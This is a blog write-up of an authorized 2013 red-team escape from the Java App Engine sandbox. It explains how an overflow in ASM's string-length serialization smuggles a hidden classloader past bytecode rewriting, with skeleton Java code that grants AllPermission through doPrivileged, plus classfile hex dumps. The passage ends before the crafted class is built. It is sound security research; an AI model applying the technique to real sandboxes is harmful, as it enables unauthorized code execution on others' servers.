How I Hacked Google App Engine: Anatomy of a Java Bytecode Exploit

Back in college, I was very interested in Java bytecode. When I got an internship at Google in 2013, I was skeptical of the security of the Java version of Google App Engine and got permission to spend the last week of my internship doing a mini red team exercise, trying to break into App Engine. This is the story of how I found a vulnerability and developed an exploit to break out of the App Engine sandbox and get arbitrary code execution on a Google server.

Background

One of the reasons I was skeptical was Java’s poor security track record. Java is unusual among programming languages in attempting to do in-process sandboxing with its Applet model, where trusted and untrusted code run within the same language runtime.

Back in the dark ages before Javascript and Webassembly took over the world, website authors that wanted to include nontrivial interactivity had to rely on browser plugins. Sun’s entry into the fray was Java Applets, a system that allowed website authors to include precompiled Java classfiles on their site. When the user views the embedding page, the browser sends that code to the Java Virtual Machine (JVM) installed on the user’s computer for execution.

In order to keep things secure, Java used a permission system to control what running code could and couldn’t do. Desktop applications were executed with all permissions by default, while Java applets ran with a very restrictive policy that prevented stuff like accessing the user’s local files.

Unfortunately, applets were still plagued with security vulnerabilities. One issue is that most of the Java runtime library is itself implemented in Java. Trusted and untrusted code run side by side in the same VM, with the only thing separating them being the permission system and visibility modifiers (public, protected, private, etc.)

This means that a bug anywhere in the JVM or standard libraries is liable to become a security vulnerability. Additionally, the attack surface is huge. The Java 7 runtime included over 17,000 classes, a lot of places for bugs to creep in.

App Engine

However, App Engine’s job was actually harder in most respects than that of Java applets. Similar to applets, untrusted Java bytecode is being executed in a sandbox, just on Google’s servers rather than the user’s machine. However, App Engine also wanted to make things easy for programmers, which meant allowing them to code the same way they would a desktop application to the greatest extent possible. This meant that App Engine allowed access to all the dangerous APIs like setAccessible and custom classloaders that were forbidden to applets for security reasons.

The one thing App Engine had going for it compared to applets is that the APIs available to users were whitelisted, so you couldn’t just call all 17,000 classes in the runtime library by default, which greatly reduced the attack surface. However, the whitelist included all the interesting core APIs like reflection and classloaders that make security difficult.

To solve this problem, App Engine used a combination of static bytecode rewriting and dynamic wrapper functions. The apis were classified into three groups for security purposes. Some apis, like java/lang/String are innocuous and always safe to call. Others are always forbidden, like the random 17,000 classes in the runtime that were never meant to be used by end users. However, the most interesting is the third type - apis like reflection whose safety depends on how they are used.

The Java reflection API allows you to dynamically call functions with names and types specified at runtime. This makes static analysis impossible, since there’s no way to tell what functions are actually being called just from looking at the code. However, App Engine couldn’t just ban reflection either, since its use is ubiquitous in legitimate Java libraries.

The solution was to transparently rewrite all submitted code before it was executed. The bytecode rewriting pass statically replaced all calls to the reflection API with wrapper functions written by the App Engine team. These wrapper functions would check which function was being called at runtime, and either allow it, block it, or return another wrapper as appropriate. There is a lot of complexity in the implementation since it needed to be transparent to the user and still work if e.g. the reflection API was itself executed via reflection, but I assume it was done correctly.

Likewise, the classloader API allows you to define new classes at runtime by passing in an array of bytes with the code of the new class to be loaded. This is a rough Java equivalent of the infamous eval function of languages like Python or Javascript. Again, classloaders have legitimate uses, but they also completely defeat static analysis. Therefore, the bytecode rewriting replaced all custom classloaders with a wrapper function that performed the bytecode rewriting step at runtime on every dynamically defined class prior to loading.

Bytecode rewriting

In order to insert these wrappers as appropriate, App Engine used the popular open source bytecode manipulation library ASM to transform the user’s code before actually executing it. (The bytecode rewriting also did other things like ensure that request timeouts are handled appropriately, but it’s the security wrappers that matter for our purposes.)

Note: ASM is an open source library that can parse and re-serialize Java classfiles, and provides an API for analyzing and making changes to the bytecode before writing it out again. The actual bytecode rewriting logic was closed source and custom written by the App Engine team. However, to simplify things, I’ll sometimes refer to App Engine’s bytecode rewriting pass as “ASM”, even though that code was not actually part of the ASM library.

The rough flow when you upload Java code to App Engine went like this:

1) User uploads binary classfiles to App Engine server
2) Classfiles are parsed by ASM 
-> (ASM's in memory representation of the code)
3) Various code transformations using ASM
-> (ASM's in memory representation of the sanitized code)
4) ASM writes the code back out as binary classfiles
5) The binaries output by ASM are executed on the JVM
-> (JVM's in memory representation of code)

As alluded to above, the API wrapping is pretty complicated. However, I decided to just assume it was all implemented correctly and not bother hunting for bugs there since I was lazy and more interested in using my knowledge of low level Java bytecode. Besides, the actual wrapper code sat on Google’s servers, so if there were vulnerabilities there, a real attacker could only find them by trial and error anyway.

Note: This assumption turned out to not be entirely correct. A year or two later, App Engine received a vulnerability report from an external security researcher who discovered a dangerous API method that they forgot to wrap properly.

Instead, I decided it would be more fun (and more realistic) to hunt for bugs in the open source ASM library in order to completely bypass the bytecode rewriting. The key is the gap between steps 3 and 5 in the above flow.

Assuming the bytecode rewriting is implemented correctly, there is an invariant that the output of step 3 is always safe to execute. However, the output of step 3 is not directly executed. Instead, ASM serializes its in-memory representation of the sanitized code to a binary classfile, and then that binary file is passed to the JVM which re-parses and executes it. This means that any difference between what ASM thinks it is writing out to a file and how the JVM actually parses it means we can potentially bypass the bytecode transformations and thus, the security checks.

The pre-45.3 short code hack

Therefore, I reviewed the open source ASM serialization code to look for bugs. However, the first idea I had for a vulnerability was not something found in the ASM source, but rather, something that wasn’t in the source.

Java has a strong backwards compatibility story. You can take classfiles compiled in the very first version of Java and run them on a JVM today and they will usually still work. In fact, old and new code is freely interoperable even without recompilation - you can write code calling into an ancient binary and have it call back to you, etc.

In order to make the Java classfile format backwards compatible, each classfile starts with a version field that tells the JVM how to parse the rest of the classfile. The version numbers roughly correspond to Java releases, except that they inexplicably started the numbering at 45 and there’s some oddity with the early versions. Java 1.02 (the first stable release of Java) used bytecode version 45.3, Java 5 is version 49.0, Java 6 is 50.0, Java 7 is 51.0, etc.

Although the first stable release of Java used bytecode version 45.3, the JVM will actually accept classfiles with versions starting at 45.0. Furthermore, there’s an undocumented feature in the JVM where it parses Code attributes slightly differently when the version is 45.0 - 45.2.

Since this feature was completely undocumented (I only discovered it by chance, looking at the JVM source code), the only bytecode tools that handled it were the ones I wrote myself. Everything else treated pre-45.3 classfiles in the same way as normal (45.3+) classfiles. Even Oracle’s own Javap tool didn’t handle this, so it’s unsurprising that neither did ASM.

In a normal classfile, the stack, locals, and code length fields of the Code attribute have lengths of 2, 2, and 4 bytes respectively, but in a pre-45.3 classfile, the JVM expects them to be 1, 1, and 2 bytes instead. Normally, this means that a pre-45.3 classfile produced by ASM will just crash when run on the JVM because the JVM encounters garbage data while parsing and rejects it.

However, if you are very careful, it is possible to construct a classfile that is valid when parsed with the 2,2,4 widths, and also valid when parsed with 1,1,2, but parses as different code in each case. This means that it is possible to craft a classfile that executes one piece of code when run on the actual JVM and displays a completely different set of fake code when viewed with reverse engineering tools, as I demonstrated here.

Note: This feature was later removed in October 2019. It appears that someone filed a bug report requesting that Javap add support for pre-45.3 classfiles, and instead, they decided to just remove the feature from JVM entirely.

Unfortunately, this issue turned out to not be exploitable in App Engine because the bytecode rewriting coincidently set the version to a minimum of 49.0. This was not done for security reasons, but because the rewriting sometimes added code that used version 49.0 features, so they decided to just unconditionally update the classfile version to a minimum of 49.0. Luckily, it didn’t take long to find another, even simpler bug in ASM.

String length overflow

Whenever Java bytecode needs to reference a string, the string data is stored as a two byte length field, followed by that many bytes of string data. However, ASM doesn’t do any overflow checking when writing out length fields (or rather didn’t back in 2013). Therefore, if ASM is told to write out, say, a 65536 byte string, instead of throwing an error, it will just silently overflow and write out 0 as the length, followed by those 65536 bytes of string data. Then when the JVM parses the classfile, it will see a 0 length string, and then move on to parsing whatever it was going to parse next, starting with those 65536 bytes of string data.

This is a pretty promising bug, but it’s not quite enough to exploit by itself. The issue is that we don’t have any way to directly produce such an oversized string. Recall that the flow goes like this:

1) User uploads binary classfiles to App Engine server
2) Classfiles are parsed by ASM 
-> (ASM's in memory representation of the code)
3) Various code transformations using ASM
-> (ASM's in memory representation of the sanitized code)
4) ASM writes the code back out as binary classfiles
5) The binaries output by ASM are executed on the JVM
-> (JVM's in memory representation of code)

We want to somehow ensure there’s a long string in ASM’s in memory representation of the sanitized code when we get to step 4. However, we don’t have any direct control over the input to step 4. The only thing we control directly is step 1, the files we upload to the server.

Since the input we send to App Engine in step 1 is a set of binary classfiles, and classfiles can’t represent a string that’s more than 65535 bytes long, that means that all the strings in steps 2 and 3 are <= 65535 bytes, and there’s no way to actually trigger the overflow bug in step 4. Or does it?

The trick is that the files we upload are never actually seen by the JVM. That means they don’t have to be strictly valid classfiles. We can upload any file we like as long as it looks enough like a classfile for ASM to parse it. Which leads to a second bug I found in ASM’s string handling.

In the classfile format, constant string data is stored in the MUTF-8 encoding. This is the same as the ubiquitous UTF-8 encoding, with two minor differences. The first (astral characters are stored as surrogate pairs) doesn’t matter for our purposes. However, the second difference is that in the UTF-8 encoding, null characters are stored as is, as a single null byte. In MUTF-8 by contrast, they are encoded as a two byte sequence, the same way that codepoints u+0080-07FF are treated in normal UTF-8. This has the advantage that a MUTF-8 encoded string will never contain literal null bytes, allowing the use of C string functions.

ASM of course encodes everything in MUTF-8 when writing out a classfile (otherwise it wouldn’t work at all). However, ASM’s classfile parser is more liberal in what it will accept. It will accept both literal null bytes and the correct two byte encoding and convert them both to null characters for the constant strings in the in-memory code representation (stored as ordinary Java Strings, which use UTF-16 encoding).

This means that if you feed ASM an almost valid classfile that is correct except for containing literal null bytes in strings, it is possible to trigger the overflow bug. For example, if the input classfile contains a string of length 32768, where the data is 32768 null bytes, the parser will convert that to a string of 32768 null characters in-memory. Then when it writes it back out to a classfile, it will encode the in-memory strings into MUTF-8, resulting in an encoding that is 32768 * 2 = 65536 bytes long. When it tries to write this out, the length field will then overflow to 0.

Exploit structure

Now that we’ve found a vulnerability, there’s the question of how to actually write an exploit for it. We will have to carefully craft an (invalid) classfile that appears innocuous, but after transformation by ASM, will get re-parsed by the JVM as malicious code.

Obviously, doing this is a pain, so we want to put the absolute minimum amount of code in the exploit classfile as possible in order to make things easier. Therefore, I decided to just put a minimal custom classloader in my exploit class, which can then be called from “safe” code to load arbitrary code and continue the exploitation process.

Therefore, we want something along the lines of this:

public class Main {
    public static void main(String[] args) throws Throwable {
        Exploit e = new Exploit();
        byte[] payload_bytecode = /* bytes for the Payload classfile */;

        Class payload_class = e.sneakyLoad(payload_bytecode);
        Method m = payload_class.getMethod("doEvilStuff");
        m.invoke(null);
    }
}

public class Exploit extends ClassLoader {
    public Class sneakyLoad(byte[] b) {
        return this.defineClass(b, 0, b.length);
    }
}

public class Payload {
    public static void doEvilStuff() {
        // evil stuff here
    }
}

Here, we have three classes: Main, Exploit, and Payload. Of these, Exploit is the only class that we need to craft by hand to bypass ASM, and it contains minimal code.

The Main class is where all the other setup code goes. We can write it in ordinary Java because it is safe from ASM’s perspective. All it does is call into our Exploit class. The Exploit class contains a classloader and a method to load a class from arbitrary bytes. Normally, ASM would have rewritten the sneakyLoad method to call ASM’s wrappers for the ClassLoader API, which would in turn apply the ASM bytecode rewriting at runtime to whatever bytecode is passed into sneakyLoad. However, since the Exploit class bypassed the bytecode rewriting, there’s no wrappers added, so sneakyLoad allows us to load arbitrary code without going through ASM again.

The Main class then calls sneakyLoad to load the Payload class, where we can put the rest of the code, for whatever we want to do after exploitation. The Payload class can also be written in ordinary Java since ASM never sees it in the first place.

Note: I do not have any of the files from the original hack in 2013, so all code seen here was recreated for the sake of this blog post, and is similar but not identical to the original exploit code. The skeleton shown here is particularly simplified. For example, in the actual App Engine, you are writing a web server, so the application entry point is a web request handler, while what I’ve shown here uses the main() method like a command line application.

Permissions

Unfortunately, the outline above doesn’t quite work. We still have to contend with the permission system.

Recall that the Java permission system is designed to do stuff like prevent applets from reading your local files. All Java code has an associated security policy with various permissions. Desktop applications are run with all permissions by default, while Java applets were run with a very restrictive set of permissions by default.

Naturally, the App Engine team decided to use the permission system as a defence in depth measure, by running user code with the most restrictive permission set possible. Even if we bypass the ASM bytecode rewriting, there’s still the fact that we don’t have permission to actually do much.

Luckily, it turns out to be easy to bypass the permission system. The key is that some permissions, such as the classloader permission, render all others irrelevant. This is because when you define a custom classloader, you can choose which permissions to assign to any class you load with it, and you can grant to the loaded classes even permissions you yourself do not possess. This is not a security bug - it’s the officially documented behavior.

For Java applets, this didn’t matter because applets weren’t granted the classloader permission in the first place. However, App Engine enables users to use custom classloaders. They made it safe by using bytecode rewriting to insert wrappers and enforce security checks. However, from the JVM’s perspective, the wrapped code is still ultimately calling a classloader under the hood. That means that among the few permissions granted to the user code, they had to grant the classloader permission and just rely purely on ASM to ensure the security of user defined classloaders.

This means that if we manage to bypass ASM and define an unrestricted classloader, it’s trivial to also bypass the permission system. However, we still have to add the code to actually do that.

We’ll start with the Exploit class, where we want to add as little code as possible. Luckily, setting the permissions on loaded classes is just a matter of adding a ProtectionDomain parameter (plus the name parameter the API also requires). We’ll just pass through the parameter, and let the Main class do the heavy lifting of actually creating the ProtectionDomain.

public class Exploit extends ClassLoader {
    public Class sneakyLoad(String name, byte[] b, ProtectionDomain pd) {
        return this.defineClass(name, b, 0, b.length, pd);
    }
}

Next, we update Main to create a ProtectionDomain with AllPermission and pass it in. Note that Main is sent “in the clear”, but ASM doesn’t care about any of the permission stuff, since we’re just calling Exploit.sneakyLoad. From ASM’s perspective, every individual user class goes through the same bytecode rewriting and thus is safe to call, so it doesn’t matter how we call sneakyLoad.

As long as we don’t call ClassLoader.defineClass directly in Main, ASM won’t mess with it. Or rather, it won’t mess with it in any way that matters - it will still wrap the reflection calls we use to call Payload.doEvilStuff after loading it, but since Payload is our own class, and thus presumed to have gone through the same bytecode rewriting process and be safe to call, the reflection wrappers will let the calls to Payload go through without complaint.

public class Main {
    public static void main(String[] args) throws Throwable {
        Exploit e = new Exploit();
        byte[] payload_bytecode = /* bytes for the Payload classfile */;

        PermissionCollection pc = new Permissions();
        pc.add(new AllPermission());
        ProtectionDomain pd = new ProtectionDomain(null, pc);

        Class payload_class = e.sneakyLoad("Payload", payload_bytecode, pd);
        Method m = payload_class.getMethod("doEvilStuff");
        m.invoke(null);
    }
}

Now we’ve granted AllPermission to the Payload class, but there’s still one more step left. Java is designed for untrusted and trusted code to run side by side. In order to reduce the risk of security vulnerabilities in (trusted) standard library code when called by untrusted code, the security manager scans the entire call stack when doing a permission check and will throw an error if any function in the call stack is missing the required permission.

Obviously, some privileged APIs are designed to be called from untrusted code, and therefore need to be able to vouch for their callers. The way to do this is to call AccessController.doPrivileged, which says “I’ve verified whatever conditions are required to ensure that the request from my (untrusted) caller is safe, so go ahead and do what I say using only my own permissions”. When the security manager scans the call stack during a permission check, it stops at the first call to AccessController.doPrivileged, instead of scanning the entire stack.

Therefore, we need to add a call to AccessController.doPrivileged to the Payload class and then implement the PrivilegedAction interface and move the actual evil code into its run method, which is done as follows:

public class Payload implements PrivilegedAction {
    public static void doEvilStuff() throws Throwable {
        AccessController.doPrivileged(new Payload());
    }

    public Object run() {
        // evil stuff here
        return null;
    }
}

Java bytecode

Now that we’ve identified the exploitable vulnerabilities in ASM and decided exactly what code we want to sneak past ASM, we have to do the hard part of actually crafting the class to bypass ASM. Unfortunately, this requires explaining a lot about the details of Java classfiles and Java bytecode, but I’ll do my best to keep it simple.

When you write Java code, you have to compile it into classfiles before you can execute it on the JVM. A minimal classfile to print “Hello, world!” looks like this:

00000000: cafe babe 0000 0031 0016 0800 1507 0014  .......1........
00000010: 0700 1301 0004 6d61 696e 0100 1628 5b4c  ......main...([L
00000020: 6a61 7661 2f6c 616e 672f 5374 7269 6e67  java/lang/String
00000030: 3b29 5601 0004 436f 6465 0900 0e00 0f0a  ;)V...Code......
00000040: 0009 000a 0700 0d0c 000b 000c 0100 0770  ...............p
00000050: 7269 6e74 6c6e 0100 1528 4c6a 6176 612f  rintln...(Ljava/
00000060: 6c61 6e67 2f4f 626a 6563 743b 2956 0100  lang/Object;)V..
00000070: 136a 6176 612f 696f 2f50 7269 6e74 5374  .java/io/PrintSt
00000080: 7265 616d 0700 120c 0010 0011 0100 036f  ream...........o
00000090: 7574 0100 154c 6a61 7661 2f69 6f2f 5072  ut...Ljava/io/Pr
000000a0: 696e 7453 7472 6561 6d3b 0100 106a 6176  intStream;...jav
000000b0: 612f 6c61 6e67 2f53 7973 7465 6d01 0010  a/lang/System...
000000c0: 6a61 7661 2f6c 616e 672f 4f62 6a65 6374  java/lang/Object
000000d0: 0100 0a48 656c 6c6f 576f 726c 6401 000c  ...HelloWorld...
000000e0: 4865 6c6c 6f20 576f 726c 6421 0001 0002  Hello World!....
000000f0: 0003 0000 0000 0001 0009 0004 0005 0001  ................
00000100: 0006 0000 0015 0002 0001 0000 0009 b200  ................
00000110: 0712 01b6 0008 b100 0000 0000 00         .............

You can run this classfile on the JVM just like a normal compiled classfile. The JVM doesn’t care where classfiles come from as long as they are structurally valid. Normally, you get classfiles by compiling Java code, but you can also compile them from other languages or even produce them by hand.

$ java HelloWorld
Hello World!

Note: Compiled Java code is referred to as bytecode because each instruction opcode is only one byte. A classfile contains both bytecode instructions and various metadata that they rely on, but I’ll refer to the entire classfile as “bytecode” for simplicity.

Krakatau

When I first got interested in Java bytecode in the summer of 2012, I started by reading the Java classfile specification, then worked out with pencil and paper the bytes needed for the code I wanted and typed them directly into a hex editor. I created a Hello World class this way, as well as my first and second Java crackmes. However, doing so is a painful and tedious process that I would not recommend anyone try more than once or twice as a learning experience.

When it came time to write my third, much larger and more ambitious crackme, I realized there was no way I could possibly do it all by hand, and thus needed an assembler, a tool that converts a high level textual representation of Java bytecode into an actual binary classfile while abstracting away tedious encoding details.

At the time, there were no good assemblers for Java bytecode (the sole contender, Jasmin, was very old, unmaintained, poorly documented, and full of bugs and missing features). Therefore, I wrote my own, Krakatau. I also wrote a disassembler, which converts a binary classfile back into the textual representation, making it much easier to debug issues when working with bytecode (as well as making it easier to reverse engineer Java applications in general).

With the Krakatau assembler, you can write the following in a text file and Krakatau will convert it to the binary classfile seen above.

.class public HelloWorld
.super java/lang/Object

.method public static main : ([Ljava/lang/String;)V
    .code stack 2 locals 1
        getstatic Field java/lang/System out Ljava/io/PrintStream;
        ldc "Hello World!"
        invokevirtual Method java/io/PrintStream println (Ljava/lang/Object;)V
        return
    .end code
.end method

Note: I completely rewrote the Krakatau assembler in 2015, changing the syntax slightly in the process in order to simplify it and add features that were impossible to support with the old syntax. All the examples of Krakatau assembly here use the current syntax, rather than the syntax of Krakatau as it existed in 2013.

This is roughly equivalent to the following Java code, minus a bunch of junk the Java compiler adds which we don’t need.

public class HelloWorld {
    public static void main(String[] args) {
        System.out.println("Hello, world!");
    }
}

As you can see from the Krakatau assembly file above, Java bytecode is relatively high level and similar to Java, compared to traditional machine code. However, you can see a few notable differences from Java here:

There are no imports or package declarations at the bytecode level, even the implicit import of java.lang.*. All types are always fully qualified in bytecode (e.g. java.lang.String instead of just String). Furthermore, bytecode uses / as the package separator rather than ., so String actually becomes java/lang/String.
In Java, classes with no explicit superclass implicitly inherit from java.lang.Object. In bytecode, you have to list the superclass explicitly.
In bytecode, methods are explicitly qualified by the containing class and descriptor. The descriptor is a string encoding the types of a method’s parameters and return types. The simplest descriptor is ()V, a method taking no arguments and returning void. Primitive types are encoded as a single letter (V for void, I for int, etc.) Class types are encoded as LFoo;, where Foo is the name of the class. Finally, array types are encoded as [ followed by the base type. Therefore, the descriptor ([Ljava/lang/String;)V means a method that takes a single parameter of type String[] and returns void, which is the signature of our main method.
Fields are also qualified by the containing class and descriptor. For fields, the descriptor is just the type of the field. Therefore, instead of writing System.out as you would in Java, you instead write (in Krakatau assembly syntax) getstatic Field java/lang/System out Ljava/io/PrintStream;. This is saying “get the field in class java.lang.System named out with type java.io.PrintStream.”

The constant pool

Whenever bytecode refers to a constant, that constant is not stored inline as part of the instruction. Instead, classfiles contain a constant pool, a list of all constants referenced by the classfile, at the beginning of the classfile, and bytecode instructions just contain an index into the classfile’s constant pool. For example, with the ldc "Hello World!" instruction above, the string “Hello World!” is not stored as part of the instruction. Instead, the instruction encoding is two bytes: first the ldc opcode (12) followed by an index into the constant pool. Likewise, the fields and methods referenced by getstatic and invokevirtual are entries in the constant pool.

Krakatau allows you to specify the constants inline for readability and convenience when writing bytecode, and the assembler will implicitly add those to the constant pool as necessary. However, it also lets you specify constant pool entries explicitly. If we disassemble the above classfile, we can see the generated constant pool, converted to explicit constant pool entries in Krakatau syntax by the disassembler:

.version 49 0 
.const [1] = String [21] 
.const [2] = Class [20] 
.const [3] = Class [19] 
.const [4] = Utf8 main 
.const [5] = Utf8 ([Ljava/lang/String;)V 
.const [6] = Utf8 Code 
.const [7] = Field [14] [15] 
.const [8] = Method [9] [10] 
.const [9] = Class [13] 
.const [10] = NameAndType [11] [12] 
.const [11] = Utf8 println 
.const [12] = Utf8 (Ljava/lang/Object;)V 
.const [13] = Utf8 java/io/PrintStream 
.const [14] = Class [18] 
.const [15] = NameAndType [16] [17] 
.const [16] = Utf8 out 
.const [17] = Utf8 Ljava/io/PrintStream; 
.const [18] = Utf8 java/lang/System 
.const [19] = Utf8 java/lang/Object 
.const [20] = Utf8 HelloWorld 
.const [21] = Utf8 'Hello World!' 

.class public [2] 
.super [3] 

.method public static [4] : [5] 
    .attribute [6] .code stack 2 locals 1 
L0:     getstatic [7] 
L3:     ldc [1] 
L5:     invokevirtual [8] 
L8:     return 
L9:     
    .end code 
.end method 
.end class 

Note: Krakatau requires that the .const directives come after the .class directive. However, I moved them to the beginning in this example to reflect the order they actually appear in the classfile in order to avoid confusion.

In this example, you can see that the ldc instruction points to constant pool entry 1 which is a string that in turn points to constant pool entry 21, which contains the string data ‘Hello World!’.

ASM’s transformations

Since I was too lazy to figure out how App Engine’s bytecode rewriting might mangle my carefully crafted classes, and a real attacker wouldn’t have the source code anyway, I decided to write the exploit as a completely innocuous class that wouldn’t trigger any of the bytecode transformation passes (and then turns into malicious code following the integer overflow in the serializer).

However, even with no bytecode transformations applied, parsing a classfile with ASM and then writing it back out is not a noop. This is because ASM parses the input into a high level in-memory representation of the code that does not preserve low level details of the original classfile, such as constant pool ordering.

Instead, ASM walks through the in-memory data structures during serialization, creating constant pool entries as it goes (and deduplicating identical constants). For example, consider the following assembly:

.class public HelloWorld
.super java/lang/Object


.const [1] = String "duplicated string"
.const [2] = String "duplicated string"
.const [3] = String "Thing 1"
.const [4] = String "Thing 2"

.method public static woodlelyDoodlely : ()V
    .code stack 99 locals 99
        ldc "This is a string"
        ldc 42

        ldc [1]
        ldc [2]

        ldc [4]
        ldc [3]

        return
    .end code
.end method

Here we have a class that just loads a couple constants and does nothing else. We have two constant pool entries containing the same data, as well as two strings that are “out of order”- We told Krakatau to put “Thing 1” first in the constant pool, but the instruction to load “Thing 2” comes first in the actual code.

We can assemble and then disassemble this class to see the details of the classfile that Krakatau generated, containing both the constant pool entries we explicitly defined, as well as implicitly generated constants.

Note that when you reference a string literal in bytecode, that instruction points to a String constant, which in turn points to a Utf8 constant containing the actual data. The String entries for “Thing 1” and “Thing 2” appear at indexes 3 and 4 respectively as requested, while the underlying Utf8 entries appear in the opposite order.

.version 49 0
.const [1] = String [17]
.const [2] = String [17]
.const [3] = String [16]
.const [4] = String [15]
.const [5] = String [14]
.const [6] = Int 42
.const [7] = Class [13]
.const [8] = Class [12]
.const [9] = Utf8 woodlelyDoodlely
.const [10] = Utf8 ()V
.const [11] = Utf8 Code
.const [12] = Utf8 java/lang/Object
.const [13] = Utf8 HelloWorld
.const [14] = Utf8 'This is a string'
.const [15] = Utf8 'Thing 2'
.const [16] = Utf8 'Thing 1'
.const [17] = Utf8 'duplicated string'

.class public [7]
.super [8]

.method public static [9] : [10]
    .attribute [11] .code stack 99 locals 99
L0:     ldc [5]
L2:     ldc [6]
L4:     ldc [1]
L6:     ldc [2]
L8:     ldc [4]
L10:    ldc [3]
L12:    return
L13:
    .end code
.end method
.end class

Now let’s put it through ASM (with no transformations, just parsing and re-serialization), and disassemble the result to see what changed:

.version 49 0
.const [1] = Utf8 HelloWorld
.const [2] = Class [1]
.const [3] = Utf8 java/lang/Object
.const [4] = Class [3]
.const [5] = Utf8 woodlelyDoodlely
.const [6] = Utf8 ()V
.const [7] = Utf8 'This is a string'
.const [8] = String [7]
.const [9] = Int 42
.const [10] = Utf8 'duplicated string'
.const [11] = String [10]
.const [12] = Utf8 'Thing 2'
.const [13] = String [12]
.const [14] = Utf8 'Thing 1'
.const [15] = String [14]
.const [16] = Utf8 Code

.class public [2]
.super [4]

.method public static [5] : [6]
    .attribute [16] .code stack 99 locals 99
L0:     ldc [8]
L2:     ldc [9]
L4:     ldc [11]
L6:     ldc [11]
L8:     ldc [13]
L10:    ldc [15]
L12:    return
L13:
    .end code
.end method
.end class

As you can see, we have the same constants as before, but in a completely different order. “Thing 2” now comes before “Thing 1”, and the two entries for “duplicated string” have been merged into one.

What this means is that the actual encoding of the file we send to App Engine doesn’t matter at all (except for the literal null bytes in the string constant of course). All that matters is the order that ASM will write out the constants after transforming the class. Luckily, this is simple and predictable - ASM just walks the code in order, top to bottom, and appends an entry to the constant pool whenever it sees a reference to a constant that doesn’t match anything already added to the constant pool.

Constant pool encoding

In the binary classfile format, the constant pool is encoded as a two byte field giving the number of constants, followed by the constant data. This is not an array, because the size of each constant is variable, depending on the type of the constant (and in the case of strings, the length of the string). Instead, the parser just keeps parsing constants until it reaches the count value and succeeds, or reaches the end of the file and/or invalid data and rejects the classfile.

In order to tell the parser how to parse the variable sized constant data entries, each constant pool entry is encoded as a tag byte, followed by the data for that constant in a format dependent on the type. For example, an Int constant is encoded as the tag byte 03, followed by four bytes of data giving the integer value. Likewise, a Long constant is encoded as the tag byte 05, followed by eight bytes of data.

A more complicated example is the Utf8 constant, (which despite its name actually stores MUTF-8 encoded string data). A Utf8 constant is encoded as the tag byte 01, followed by a two byte length field, and then that many bytes of encoded string data.

To see how this works, let’s create a class containing the Utf8 constant “evilstring” and nothing else:

.class [0]
.super [0]
.const [1] = Utf8 "evilstring"

Then we can assemble it with Krakatau and look at the generated classfile in a hex editor as shown below.

Note: Normally, a classfile will contain other stuff - at the very minimum, it needs a constant pool entry to store the name of the class itself. However, I set the class and superclass to [0], i.e. null, here in order to avoid cluttering up the example. This is not actually valid - in fact, I had to specifically modify Krakatau to accept this example for the sake of illustration.

00000000: cafe babe 0000 0031 0002 0100 0a65 7669  .......1.....evi
00000010: 6c73 7472 696e 6700 0000 0000 0000 0000  lstring.........
00000020: 0000 0000 00                             .....

Here we can see the constant pool count field (0002, because it is actually one more than the number of constant pool entries), followed by our “evilstring” constant, 0100 0a65 7669 6c73 7472 696e 67. We have the tag byte for a Utf8 constant, 01, followed by the two byte string length field, 00 0a, followed by the string data, 65 7669 6c73 7472 696e 67, which is the ASCII encoding for “evilstring”.

Now let’s try it with multiple constants:

.class [6]
.super [0]
.const [1] = Utf8 "evilstring"
.const [2] = String [1]
.const [3] = Int 0x77778888
.const [4] = Long 0x0123456789ABCDEFL
.const [6] = Class [1]

00000000: cafe babe 0000 0031 0007 0100 0a65 7669  .......1.....evi
00000010: 6c73 7472 696e 6708 0001 0377 7788 8805  lstring....ww...
00000020: 0123 4567 89ab cdef 0700 0100 0000 0600  .#Eg............
00000030: 0000 0000 0000 0000 00                   .........

Here, we have the constant pool count field 0007, followed by our “evilstring” constant (0100 0a65 7669 6c73 7472 696e 67) as before. This time, we followed it by a String constant, which uses the tag byte 08, followed by a constant pool index pointing to Utf8 data (0001 here, since our Utf8 constant is at index 1 in the constant pool). (Recall that when you reference a string literal in bytecode, that points to the String constant, rather than the underlying Utf8 constant.)

Next, we have the Int constant 0377 7788 88, consisting of the tag byte 03 followed by the four bytes of integer data (for our 0x77778888). Then we have the Long constant 05 0123 4567 89ab cdef, which is similar.

Lastly, I added a Class constant with the name “evilstring”. Similar to String constants, Class constants are just a tag byte (07), followed by the index of the underlying Utf8 data (00 01 in this case). I also added it to the .class directive at the start, so this example will actually assemble with an unmodified Krakatau, resulting in a class named “evilstring”.

There’s one other oddity here - Long and Double constants count as two constant pool entries, for reasons that must have seemed like a good idea back in 1996. Therefore, the next constant following our Long constant at index 4 is at index 6 rather than 5 as you might have expected.

Overflow for fun and profit

In order to avoid worrying about it getting mangled by the bytecode rewriting passes, the class we send to ASM will be completely innocuous. It will look something like this:

public class Exploit {
    public int woodlelyDoodlely() {
        "evilstring";
        42;
        0x12345678;
        "some"; "other"; "constants";
        return 0;
    }
}

All it contains is a single method that loads a bunch of constants and does absolutely nothing, so the bytecode rewriting won’t change anything before it gets re-serialized by ASM. The magic happens when ASM’s serializer overflows the string length field, resulting in a classfile containing the actual exploit code we want.

However, actually setting this up is a bit complicated, so before we get into the process of writing the actual exploit, here’s an illustration of how overflow can completely change the meaning of a class, using a much simpler example.

.class [0]
.super [0]
.const [1] = Utf8 "evilstring"

Let’s take the minimal example from before, but pretend that instead of writing out the correct length (000a), the length field overflows to 0 (0000). In reality, we’d need to add thousands of null bytes to the string to make it overflow, but that would make the example unmanageably large and hard to read, so we’re just pretending that “evilstring” itself overflows for the sake of example.

00000000: cafe babe 0000 0031 0002 0100 0065 7669  .......1.....evi
00000010: 6c73 7472 696e 6700 0000 0000 0000 0000  lstring.........
00000020: 0000 0000 00                             .....

When the JVM parses this class, it starts parsing constants at the 01 as before. It sees this is a Utf8 constant and reads the length field to see how many bytes to read for the string. However, this time, the length field is 0000 instead of 000a, resulting in just an empty string constant. Having completed parsing of the constant pool, the JVM then starts parsing whatever is next in the classfile, starting at the 65 byte (the “e” in “evilstring”).

The overall structure of the classfile is as follows:

ClassFile {
    u4             magic;
    u2             minor_version;
    u2             major_version;
    u2             constant_pool_count;
    cp_info        constant_pool[constant_pool_count-1];
    u2             access_flags;
    u2             this_class;
    u2             super_class;
    u2             interfaces_count;
    u2             interfaces[interfaces_count];
    u2             fields_count;
    field_info     fields[fields_count];
    u2             methods_count;
    method_info    methods[methods_count];
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}

